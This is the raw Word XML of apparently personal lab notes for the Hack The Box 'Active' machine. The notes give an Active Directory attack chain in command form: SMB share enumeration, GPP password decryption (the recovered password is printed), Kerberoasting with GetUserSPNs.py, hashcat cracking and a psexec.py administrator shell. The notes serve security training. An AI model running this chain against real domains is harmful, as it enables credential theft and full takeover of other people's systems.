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63F908EA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D13D1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active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5AA3895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  <w:r w:rsidR="007D0857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this lab we will see, how to use </w:t>
      </w:r>
      <w:r w:rsidR="007D0857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetUserSPNs.py</w:t>
      </w:r>
      <w:r w:rsidR="007D0857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in shell to obtain the password of the administrator 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309DA08C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D13D1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13D1C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D13D1C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D13D1C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D13D1C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D13D1C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D13D1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13D1C"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08E1251C" w14:textId="16579A6D" w:rsidR="00A20EFC" w:rsidRDefault="00A20EFC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-L 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3C21E9B7" w14:textId="77777777" w:rsidR="00A20EFC" w:rsidRDefault="00A20EFC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72A349B4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3. </w:t>
      </w:r>
      <w:r w:rsidR="00893E95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789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39AF914C" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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-L 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1F65E0DC" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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smbmap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see what’s we can read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="22702001" w:rsidR="00843DCE" w:rsidRDefault="00893E95" w:rsidP="00893E95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/replication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08923F15" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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-r replication = we notice group.xml file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8AB582" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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-r replication -A group.xml -q = q id for quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6234DC" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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terminal locate group.xml = it goes where the shell shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92C6D8" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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encrypted password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E32E1B" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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gpp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-decrypt paste = GPPstillStandingStrong2k18 of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svc_tgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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448DB27B" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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apt search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gpp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-decrypt = to download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B04F5D3" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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GetADUsers.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58574AA9" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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GetADUsers.py -all t -dc-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active.htb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svc_tgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27D81947" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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smbmap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svc_tgs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paste -H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active.htb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-R users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E7124" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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start bloodhound server and try to notice connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64573C55" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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GetUserSPNs.py -request -dc-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active.htb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svc_tgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01B262F2" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E9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now we have the administrator password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A9E21" w14:textId="77777777" w:rsidR="00893E95" w:rsidRDefault="00893E95" w:rsidP="00893E95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hashcat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-m 13100 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file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rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="58B43E80" w:rsidR="00843DCE" w:rsidRDefault="00893E9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use psexec.py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active.htb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administrator@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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64214A56" w14:textId="10934CCC" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00893E95" w:rsidP="00893E95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administrator Desktop we obtain the root.txt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36D10"/>
    <w:rsid w:val="0006225A"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000D3D7F"/>
    <w:rsid w:val="00121424"/>
    <w:rsid w:val="001C2664"/>
    <w:rsid w:val="002B6AF1"/>
    <w:rsid w:val="002E12C7"/>
    <w:rsid w:val="0035435D"/>
    <w:rsid w:val="00364B64"/>
    <w:rsid w:val="003A5A18"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00614018"/>
    <w:rsid w:val="007D0857"/>
    <w:rsid w:val="00825DCE"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00867212"/>
    <w:rsid w:val="00893E95"/>
    <w:rsid w:val="00935476"/>
    <w:rsid w:val="00984B47"/>
    <w:rsid w:val="00A20EFC"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AC4800"/>
    <w:rsid w:val="00B12114"/>
    <w:rsid w:val="00BE7827"/>
    <w:rsid w:val="00C66DF6"/>
    <w:rsid w:val="00C94A78"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D13D1C"/>
    <w:rsid w:val="00D503A8"/>
    <w:rsid w:val="00DF520C"/>
    <w:rsid w:val="00F123CE"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FE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95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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-24T06:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>